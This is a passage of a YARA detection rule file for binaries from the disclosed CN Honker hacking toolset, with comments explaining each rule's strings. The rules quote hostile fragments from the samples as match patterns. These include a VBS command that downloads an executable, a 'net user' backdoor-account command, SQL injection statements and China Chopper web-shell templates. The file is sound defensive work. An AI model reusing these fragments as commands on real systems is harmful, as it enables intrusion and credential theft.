        $s12 = "webBrowser1_ProgressChanged" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 470KB and all of them
}

rule CN_Honker_SwordHonkerEdition {
    /* SwordHonkerEdition.exe from the CN Honker toolset. The three wide
       strings are a port-list config path, a thread-count setting line
       and a scan-result label; together they point at a port scanner
       component. All three are required. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file SwordHonkerEdition.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "3f9479151c2cada04febea45c2edcf5cece1df6c"
        id = "5688fa03-bcb0-545d-9fdf-7ab48a389424"
    strings:
        $s0 = "\\bin\\systemini\\MyPort.ini" wide /* PEStudio Blacklist: strings */
        $s1 = "PortThread=200 //" fullword wide /* PEStudio Blacklist: strings */
        /* Leading and trailing spaces are part of the literal. */
        $s2 = " Port Open -> " fullword wide /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 375KB and all of them
}

rule CN_Honker_HASH_PwDump7 {
    /* PwDump7.exe from the CN Honker toolset: a credential-dumping
       utility. $s1 is the on-disk SAM hive path template it opens, and
       $s2-$s4 are its own status/error messages. All four are required. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file PwDump7.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "93a2d7c3a9b83371d96a575c15fe6fce6f9d50d3"
        id = "d61a1ac3-7c8a-5de2-a5a8-2a043b73f3b3"
    strings:
        $s1 = "%s\\SYSTEM32\\CONFIG\\SAM" fullword ascii /* PEStudio Blacklist: strings */
        $s2 = "No Users key!" fullword ascii /* PEStudio Blacklist: strings */
        $s3 = "NO PASSWORD*********************:" fullword ascii /* PEStudio Blacklist: strings */
        $s4 = "Unable to dump file %S" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 380KB and all of them
}

rule CN_Honker_ChinaChopper {
    /* ChinaChopper.exe (web-shell client) from the CN Honker toolset.
       The condition is "1 of them", so any single string is enough to
       fire: $s1 is the PHP-side request handler fragment, $s3 a cmd.exe
       path command, and $s4 the ASP-side Eval/Execute fragment with the
       keywords split by spaces exactly as stored in the sample. Each
       string is a client-embedded payload template, which is why one
       match is considered sufficient. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file ChinaChopper.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "fa347fdb23ab0b8d0560a0d20c434549d78e99b5"
        id = "9f7fbaac-65b5-5162-87d1-96ccd9711adb"
    strings:
        $s1 = "$m=get_magic_quotes_gpc();$sid=$m?stripslashes($_POST[\"z1\"]):$_POST[\"z1\"];$u" wide /* PEStudio Blacklist: strings */
        $s3 = "SETP c:\\windows\\system32\\cmd.exe " fullword wide /* PEStudio Blacklist: strings */
        $s4 = "Ev al (\"Exe cute(\"\"On+Error+Resume+Next:%s:Response.Write(\"\"\"\"->|\"\"\"\"" wide /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 2000KB and 1 of them
}

rule CN_Honker_dedecms5_7 {
    /* dedecms5.7.exe from the CN Honker toolset. $s1 is a DedeCMS version
       file path the tool requests; $s2 is a UI skinning library name that
       also appears in the T00ls Lpk Sethc v3.0 rule and is presumably
       shared by unrelated software -- it only contributes in combination
       with $s1. Both are required. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file dedecms5.7.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "f9cbb25883828ca266e32ff4faf62f5a9f92c5fb"
        id = "b037862d-2821-5e96-996b-13ab241575ba"
    strings:
        $s1 = "/data/admin/ver.txt" fullword ascii /* PEStudio Blacklist: strings */
        $s2 = "SkinH_EL.dll" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 830KB and all of them
}

rule CN_Honker_Alien_ee {
    /* ee.exe from the CN Honker toolset: a small PE (< 50KB) whose two
       wide strings describe reading IIS account names and passwords.
       Both are required. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file ee.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "15a7211154ee7aca29529bd5c2500e0d33d7f0b3"
        id = "03540f82-6662-55e3-97f8-38776271f08b"
    strings:
        $s1 = "GetIIS UserName and PassWord." fullword wide /* PEStudio Blacklist: strings */
        $s2 = "Read IIS ID For FreeHost." fullword wide /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 50KB and all of them
}

rule CN_Honker_smsniff_smsniff {
    /* smsniff.exe from the CN Honker toolset. NOTE(review): both strings
       are just the product and file name of SmartSniff, a packet-capture
       utility that is also distributed legitimately, so this rule
       presumably fires on the standard SmartSniff binary as well as the
       bundled copy -- treat as a dual-use tool hit and corroborate with
       context before escalating. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file smsniff.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "8667a785a8ced76d0284d225be230b5f1546f140"
        id = "fef242d5-b274-5217-a5d1-1a6ec38d0fdd"
    strings:
        $s1 = "smsniff.exe" fullword wide
        $s5 = "SmartSniff" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 267KB and all of them
}

rule CN_Honker_Happy_Happy {
    /* Happy.exe from the CN Honker toolset. $s1 is a form-extraction
       regex stored as a literal (backslashes escaped so YARA matches the
       text, not a regex); $s2 a companion scanner name; $s3 a vendor URL;
       $s4 a generic "cmdshell" token. Any 2 of the 4 suffice, so the
       generic $s4 can fire together with the URL alone. */
    meta:
        description = "Sample from CN Honker Pentest Toolset - file Happy.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        modified = "2023-01-27"
        score = 70
        hash = "92067d8dad33177b5d6c853d4d0e897f2ee846b0"
        id = "6e6c806d-e784-507f-b327-3b9f2510422b"
    strings:
        $s1 = "<form.*?method=\"post\"[\\s\\S]*?</form>" fullword wide /* PEStudio Blacklist: strings */
        $s2 = "domainscan.exe" fullword wide /* PEStudio Blacklist: strings */
        $s3 = "http://www.happysec.com/" wide
        $s4 = "cmdshell" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 655KB and 2 of them
}

rule CN_Honker_T00ls_Lpk_Sethc_v3_0 {
    // "T00ls Lpk Sethc v3.0.exe" from the toolset. Any 2 of 3 strings fire.
    // NOTE(review): $s3 is a skinning-library DLL name that may also appear in
    // unrelated GUI programs; confirm that the $s1+$s3 pairing alone is an
    // acceptable match before relying on this rule at scale.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file T00ls Lpk Sethc v3.0.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "fa47c4affbac01ba5606c4862fdb77233c1ef656"
        id = "7513a513-e8a3-58a8-8dd5-512ba33ff013"
    strings:
        $s1 = "http://127.0.0.1/1.exe" fullword wide /* PEStudio Blacklist: strings */
        $s2 = ":Rices Forum:T00Ls.Net [4 Fucker Te@m]" fullword wide
        $s3 = "SkinH_EL.dll" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 1000KB and 2 of them
}
rule CN_Honker_NetFuke_NetFuke {
    // NetFuke.exe from the toolset: a status message and a log-file name
    // pattern. Both must be present.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file NetFuke.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "f89e223fd4f6f5a3c2a2ea225660ef0957fc07ba"
        id = "833da5c7-e562-50e9-a2a9-54c36b0d1f61"
    strings:
        $s1 = "Mac Flood: Flooding %dT %d p/s " fullword ascii
        $s2 = "netfuke_%s.txt" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 1840KB and all of them
}
rule CN_Honker_ManualInjection {
    // ManualInjection.exe from the toolset: a hard-coded local test URL and
    // the author's site banner. Both must be present.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file ManualInjection.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "e83d427f44783088a84e9c231c6816c214434526"
        id = "f0899003-824f-56ed-b653-9f7a77b9ec6a"
    strings:
        $s0 = "http://127.0.0.1/cookie.asp?fuck=" fullword ascii /* PEStudio Blacklist: strings */
        $s16 = "http://Www.cnhuker.com | http://www.0855.tv" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 3000KB and all of them
}
rule CN_Honker_CnCerT_CCdoor_CMD {
    // CnCerT.CCdoor.CMD.dll from the toolset. $s3-$s5 are shared with
    // CN_Honker_CnCerT_CCdoor_CMD_2 (same component, different module name);
    // the two rules differ only in the wide module-name string and both
    // require every string, so they will not cross-fire.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file CnCerT.CCdoor.CMD.dll"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "1c6ed7d817fa8e6534a5fd36a94f4fc2f066c9cd"
        id = "ddd328a8-7ad8-5b26-9deb-3e5da801cd1b"
    strings:
        $s2 = "CnCerT.CCdoor.CMD.dll" fullword wide
        $s3 = "cmdpath" fullword ascii
        $s4 = "Get4Bytes" fullword ascii
        $s5 = "ExcuteCmd" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 22KB and all of them
}
rule CN_Honker_termsrvhack {
    // termsrvhack.dll from the toolset (a modified terminal-services DLL).
    // NOTE(review): $s1 is a Windows Terminal Server licensing message and
    // $s6 a generic path format string; both could plausibly also appear in an
    // unmodified termsrv.dll. Verify against a clean copy before treating a
    // hit as proof of tampering.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file termsrvhack.dll"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "1c456520a7b7faf71900c71167038185f5a7d312"
        id = "4fd582a1-3c6d-57a1-bba0-f775bb61ef00"
    strings:
        // Not fullword: matches as a prefix of the longer message.
        $s1 = "The terminal server cannot issue a client license. It was unable to issue the" wide /* PEStudio Blacklist: strings */
        $s6 = "%s\\%s\\%d\\%d" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 1052KB and all of them
}
rule CN_Honker_IIS6_iis6 {
    // iis6.com from the toolset. $s3 is flagged as a frequent goodware string
    // (see trailing comment); it cannot fire alone because the condition
    // requires all four strings.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file iis6.com"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "f0c9106d6d2eea686fd96622986b641968d0b864"
        id = "f5d49cbd-1aec-5126-ab5d-83e485fa6869"
    strings:
        $s0 = "GetMod;ul" fullword ascii
        $s1 = "excjpb" fullword ascii
        $s2 = "LEAUT1" fullword ascii
        $s3 = "EnumProcessModules" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 410 times */
    condition:
        uint16(0) == 0x5a4d and filesize < 50KB and all of them
}
rule CN_Honker_struts2_catbox {
    // catbox.exe from the toolset: an author banner and an embedded script
    // fragment. Both must be present.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file catbox.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "ee8fbd91477e056aef34fce3ade474cafa1a4304"
        id = "24df7a11-5ec4-5e7b-86f6-6195ca01b8f9"
    strings:
        $s6 = "'Toolmao box by gainover www.toolmao.com" fullword ascii
        $s20 = "{external.exeScript(_toolmao_bgscript[i],'javascript',false);}}" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 8160KB and all of them
}
rule CN_Honker_getlsasrvaddr {
    // getlsasrvaddr.exe from the toolset (described as the WCE helper from
    // Amplia Security). All three strings required.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file getlsasrvaddr.exe - WCE Amplia Security"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        modified = "2022-12-21"
        score = 70
        hash = "a897d5da98dae8d80f3c0a0ef6a07c4b42fb89ce"
        id = "fa0c0376-c5c3-5b48-b03e-86cefb547479"
    strings:
        $s8 = "pingme.txt" fullword ascii /* PEStudio Blacklist: strings */
        // PDB path fragment; not fullword so it matches inside a longer path.
        $s16 = ".\\lsasrv.pdb" ascii
        $s20 = "Addresses Found: " fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 100KB and all of them
}
rule CN_Honker_ms10048_x64 {
    // ms10048-x64.exe from the toolset: two console status messages. Both
    // must be present.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file ms10048-x64.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "418bec3493c85e3490e400ecaff5a7760c17a0d0"
        id = "b65b0bad-d74c-5e7a-a613-69ef80585c23"
    strings:
        $s1 = "[ ] Creating evil window" fullword ascii
        $s2 = "[+] Set to %d exploit half succeeded" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 125KB and all of them
}
rule CN_Honker_LogCleaner {
    // LogCleaner.exe from the toolset: a usage line and a version banner.
    // Both must be present.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file LogCleaner.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "ab77ed5804b0394d58717c5f844d9c0da5a9f03e"
        id = "63ec5e47-9f3e-547a-bbff-cac8b27ac8f7"
    strings:
        $s3 = ".exe <ip> [(path]" fullword ascii
        // Not fullword: tolerates whatever version number follows "v".
        $s4 = "LogCleaner v" ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 250KB and all of them
}
rule CN_Honker_shell_brute_tool {
    // shell_brute_tool.exe from the toolset. $s1 is a widespread legacy
    // User-Agent string and is not specific on its own; the condition requires
    // both strings, so $s0 carries the specificity.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file shell_brute_tool.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "f6903a15453698c35dce841e4d09c542f9480f01"
        id = "80fd0c9f-0ed9-5308-ac72-65b9b3b47ed1"
    strings:
        $s0 = "http://24hack.com/xyadmin.asp" fullword ascii /* PEStudio Blacklist: strings */
        $s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii /* PEStudio Blacklist: agent */
    condition:
        uint16(0) == 0x5a4d and filesize < 1000KB and all of them
}
rule CN_Honker_hxdef100 {
    // hxdef100.exe from the toolset: a capability marker plus two
    // configuration placeholder tokens. All three required.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file hxdef100.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "bf30ccc565ac40073b867d4c7f5c33c6bc1920d6"
        id = "3b931752-85ae-52d0-9deb-1a1b03b39e32"
    strings:
        $s6 = "BACKDOORSHELL" fullword ascii /* PEStudio Blacklist: strings */
        $s15 = "%tmpdir%" fullword ascii
        $s16 = "%cmddir%" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 200KB and all of them
}
rule CN_Honker_Arp_EMP_v1_0 {
    // "Arp EMP v1.0.exe" from the toolset. Only one string is defined, so
    // "all of them" reduces to that single filename/version string.
    // NOTE(review): a lone resource-name indicator is easy to lose if the
    // binary is rebuilt or renamed; a second, code-derived string would make
    // the rule more robust — confirm against the sample.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file Arp EMP v1.0.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "ae4954c142ad1552a2abaef5636c7ef68fdd99ee"
        id = "03782e94-4fac-529f-b235-19cdb124d53b"
    strings:
        $s0 = "Arp EMP v1.0.exe" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 400KB and all of them
}
rule CN_Honker_GetWebShell {
    // GetWebShell.exe from the toolset. The condition is "1 of them": any
    // single indicator fires, so each string must be specific on its own.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file GetWebShell.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "b63b53259260a7a316932c0a4b643862f65ee9f8"
        id = "919883f4-af66-5d07-ad41-8cba3e049396"
    strings:
        $s0 = "echo P.Open \"GET\",\"http://www.baidu.com/ma.exe\",0 >>run.vbs" fullword ascii /* PEStudio Blacklist: strings */
        $s5 = "http://127.0.0.1/sql.asp?id=1" fullword wide /* PEStudio Blacklist: strings */
        $s14 = "net user admin$ hack /add" fullword wide /* PEStudio Blacklist: strings */
        $s15 = ";Drop table [hack];create table [dbo].[hack] ([cmd] [image])--" fullword wide /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 70KB and 1 of them
}
rule CN_Honker_Cracker_SHELL {
    // SHELL.exe from the toolset. All four strings required; $s3 and $s4 are
    // generic on their own and rely on $s1/$s2 for specificity.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file SHELL.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "c1dc349ff44a45712937a8a9518170da8d4ee656"
        id = "2249a058-7469-5054-9c51-cb20ef8197ca"
    strings:
        $s1 = "http://127.0.0.1/error1.asp" fullword ascii /* PEStudio Blacklist: strings */
        $s2 = "password,PASSWORD,pass,PASS,Lpass,lpass,Password" fullword wide /* PEStudio Blacklist: strings */
        // Not fullword: matches as a path suffix.
        $s3 = "\\SHELL" wide /* PEStudio Blacklist: strings */
        $s4 = "WebBrowser1" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 200KB and all of them
}
rule CN_Honker_MSTSC_can_direct_copy {
    // MSTSC_can_direct_copy.EXE from the toolset (a modified RDP client).
    // NOTE(review): $s1 (mstsc.pdb path) and $s3 (/migrate help text) look
    // like strings shipped with the stock mstsc.exe; $s2 is presumably what
    // distinguishes the modified build. Confirm against an unmodified client
    // before deploying this rule broadly.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file MSTSC_can_direct_copy.EXE"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        modified = "2022-12-21"
        score = 70
        hash = "2f3cbfd9f82f8abafdb1d33235fa6bfa1e1f71ae"
        id = "9155cb6f-14b6-524a-9cb9-1a88f7facf4e"
    strings:
        $s1 = "srv\\newclient\\lib\\win32\\obj\\i386\\mstsc.pdb" ascii
        $s2 = "Clear Password" fullword wide /* PEStudio Blacklist: strings */
        $s3 = "/migrate -- migrates legacy connection files that were created with " fullword wide /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 600KB and all of them
}
rule CN_Honker_lcx_lcx {
    // lcx.exe (HTRAN port-forwarder) from the toolset. Condition is
    // "1 of them": any single usage/banner string fires, bounded by the
    // tight 30KB size cap. $s2 and $s3 are not fullword.
    meta:
        description = "Sample from CN Honker Pentest Toolset - HTRAN - file lcx.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "0c8779849d53d0772bbaa1cedeca150c543ebf38"
        id = "6c2e1e85-6387-5be2-b7b2-5ae8a5cca6df"
    strings:
        $s1 = "%s -<listen|tran|slave> <option> [-log logfile]" fullword ascii /* PEStudio Blacklist: strings */
        $s2 = "=========== Code by lion & bkbll" ascii
        $s3 = "Welcome to [url]http://www.cnhonker.com[/url] " ascii
        $s4 = "-tran <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii /* PEStudio Blacklist: strings */
        $s5 = "[+] Start Transmit (%s:%d <-> %s:%d) ......" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 30KB and 1 of them
}
rule CN_Honker_PostgreSQL {
    // PostgreSQL.exe from the toolset: a hard-coded private-range test URL
    // and an internal module name. Both must be present.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file PostgreSQL.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "1ecfaa91aae579cfccb8b7a8607176c82ec726f4"
        id = "ae90d03c-ef67-5ece-81ae-86947196a81c"
    strings:
        $s1 = "&http://192.168.16.186/details.php?id=1" fullword ascii
        $s2 = "PostgreSQL_inject" fullword ascii /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 2000KB and all of them
}
rule CN_Honker_WebRobot {
    // WebRobot.exe from the toolset: a report filename format and two data
    // file paths. All three required; $s2/$s3 are path fragments (not
    // fullword) so they match inside longer paths.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file WebRobot.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "af054994c911b4301490344fca4bb19a9f394a8f"
        id = "8b6350b6-17ea-5f44-a42a-875d55bb2de8"
    strings:
        $s1 = "%d-%02d-%02d %02d^%02d^%02d ScanReprot.htm" fullword ascii /* PEStudio Blacklist: strings */
        $s2 = "\\log\\ProgramDataFile.dat" ascii /* PEStudio Blacklist: strings */
        $s3 = "\\data\\FilterKeyword.txt" ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 2000KB and all of them
}
rule CN_Honker_Baidu_Extractor_Ver1_0 {
    // Baidu_Extractor_Ver1.0.exe from the toolset. Each string is common in
    // isolation (a user profile path, two search-engine domains, a ping
    // command prefix); only the conjunction of all four is treated as a hit.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file Baidu_Extractor_Ver1.0.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "1899f979360e96245d31082e7e96ccedbdbe1413"
        id = "94f3c3d8-aa68-5589-b26f-42315634ff30"
    strings:
        $s3 = "\\Users\\Admin" wide /* PEStudio Blacklist: strings */
        $s11 = "soso.com" fullword wide
        $s12 = "baidu.com" fullword wide
        $s19 = "cmd /c ping " fullword wide /* PEStudio Blacklist: strings */
    condition:
        uint16(0) == 0x5a4d and filesize < 500KB and all of them
}
rule CN_Honker_FTP_scanning {
    // FTP_scanning.exe from the toolset. All four strings required.
    // NOTE(review): $s1 and $s2 look like truncated fragments (e.g. of a
    // longer class name and DLL name); confirm they occur verbatim in the
    // sample, since fullword matching will not bridge a cut token.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file FTP_scanning.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "5a3543ee5aed110c87cbc3973686e785bcb5c44e"
        id = "828a0dc8-3748-5c07-a767-4f9e85968ca1"
    strings:
        $s1 = "CNotSupportedE" fullword ascii /* PEStudio Blacklist: strings */
        $s2 = "nINet.dll" fullword ascii
        $s9 = "?=MODULE" fullword ascii /* PEStudio Blacklist: strings */
        $s13 = "MSIE 6*" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 550KB and all of them
}
rule CN_Honker_dirdown_dirdown {
    // dirdown.exe from the toolset (internal name "Decompress"). A PDB path
    // fragment, the module name and a helper symbol; all three required.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file dirdown.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        modified = "2022-12-21"
        score = 70
        hash = "7b8d51c72841532dded5fec7e7b0005855b8a051"
        id = "80f98131-79bf-580d-87ad-a54a3f14b301"
    strings:
        // Not fullword: matches inside the full build path.
        $s0 = "\\Decompress\\obj\\Release\\Decompress.pdb" ascii /* PEStudio Blacklist: strings */
        $s1 = "Decompress.exe" fullword wide
        $s5 = "Get8Bytes" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 45KB and all of them
}
rule CN_Honker_Xiaokui_conversion_tool {
    // Xiaokui_conversion_tool.exe from the toolset. Any 2 of 3 fire; $s2
    // ("To.exe") is the weakest indicator and needs one of the other two.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file Xiaokui_conversion_tool.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "dccd163e94a774b01f90c1e79f186894e2f27de3"
        id = "26e30df6-b1d9-5d82-b368-a4a904939aa3"
    strings:
        $s1 = "update [dv_user] set usergroupid=1 where userid=2;--" fullword ascii /* PEStudio Blacklist: strings */
        $s2 = "To.exe" fullword wide
        $s3 = "by zj1244" ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 240KB and 2 of them
}
rule CN_Honker_GroupPolicyRemover {
    // GroupPolicyRemover.exe (internal name GP_killer) from the toolset.
    // $s2 is flagged as a goodware string (see trailing comment); it cannot
    // fire alone because all three strings are required.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file GroupPolicyRemover.exe"
        license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
        author = "Florian Roth (Nextron Systems)"
        reference = "Disclosed CN Honker Pentest Toolset"
        date = "2015-06-23"
        score = 70
        hash = "7475d694e189b35899a2baa462957ac3687513e5"
        id = "e581172d-fcea-5281-ba9f-06b35c9a513e"
    strings:
        $s0 = "GP_killer.EXE" fullword wide /* PEStudio Blacklist: strings */
        $s1 = "GP_killer Microsoft " fullword wide /* PEStudio Blacklist: strings */
        $s2 = "SHDeleteKeyA" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 79 times */
    condition:
        uint16(0) == 0x5a4d and filesize < 700KB and all of them
}
rule CN_Honker_WordpressScanner {
    // WordpressScanner.exe from the toolset. $s0 is a common legacy
    // User-Agent and $s4 an MFC resource-header line seen in many builds;
    // all four strings are required, so $s1/$s2 carry the specificity.
    meta:
        description = "Sample from CN Honker Pentest Toolset - file WordpressScanner.exe"
